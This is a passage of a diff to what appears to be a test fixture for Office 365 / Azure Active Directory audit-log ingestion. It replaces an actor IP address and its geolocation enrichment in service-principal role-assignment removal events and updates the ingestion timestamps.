fe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"d37460cd-3d19-4ae9-9515-015f27036e74\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:47.4999796Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FYE60\"},{\"Name\":\"env_seqNum\",\"Value\":\"51372052\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"115f72b6-e8e6-4710-98e9-63ccd20bf2ec\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -2653,25 +2419,7 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "as": {
- "number": 3352,
- "organization": {
- "name": "Telefonica De Espana"
- }
- },
- "ip": "83.57.233.151"
+ "ip": "67.43.156.15"
 },
 "tags": [
 "preserve_original_event"
@@ -2685,7 +2433,7 @@
 "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com",
 "ResultStatus": "Success",
 "UserKey": "1003200096971F55@testsiem.onmicrosoft.com",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "ExtendedProperties": {
 "actorObjectClass": "User",
 "teamName": "MSODS.",
@@ -2821,7 +2569,7 @@
 "asr"
 ],
 "ip": [
- "83.57.233.151"
+ "67.43.156.15"
 ]
 },
 "organization": {
@@ -2833,12 +2581,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036147Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:34:47\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"d37460cd-3d19-4ae9-9515-015f27036e74\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:47.4999796Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FYE60\"},{\"Name\":\"env_seqNum\",\"Value\":\"51372061\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"02868191-019a-453a-a3a9-a21f44898778\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.124905900Z", + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:47\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"d37460cd-3d19-4ae9-9515-015f27036e74\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:47.4999796Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FYE60\"},{\"Name\":\"env_seqNum\",\"Value\":\"51372061\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"02868191-019a-453a-a3a9-a21f44898778\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -2864,25 +2612,7 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "as": {
- "number": 3352,
- "organization": {
- "name": "Telefonica De Espana"
- }
- },
- "ip": "83.57.233.151"
+ "ip": "67.43.156.15"
 },
 "tags": [
 "preserve_original_event"
@@ -2896,7 +2626,7 @@
 "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com",
 "ResultStatus": "Success",
 "UserKey": "1003200096971F55@testsiem.onmicrosoft.com",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "ExtendedProperties": {
 "actorObjectClass": "User",
 "teamName": "MSODS.",
@@ -3032,7 +2762,7 @@
 "asr"
 ],
 "ip": [
- "83.57.233.151"
+ "67.43.156.15"
 ]
 },
 "organization": {
@@ -3044,12 +2774,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036153100Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:34:47\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"d37460cd-3d19-4ae9-9515-015f27036e74\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:47.4999796Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FYE60\"},{\"Name\":\"env_seqNum\",\"Value\":\"51372052\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"115f72b6-e8e6-4710-98e9-63ccd20bf2ec\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.124912500Z", + "original": 
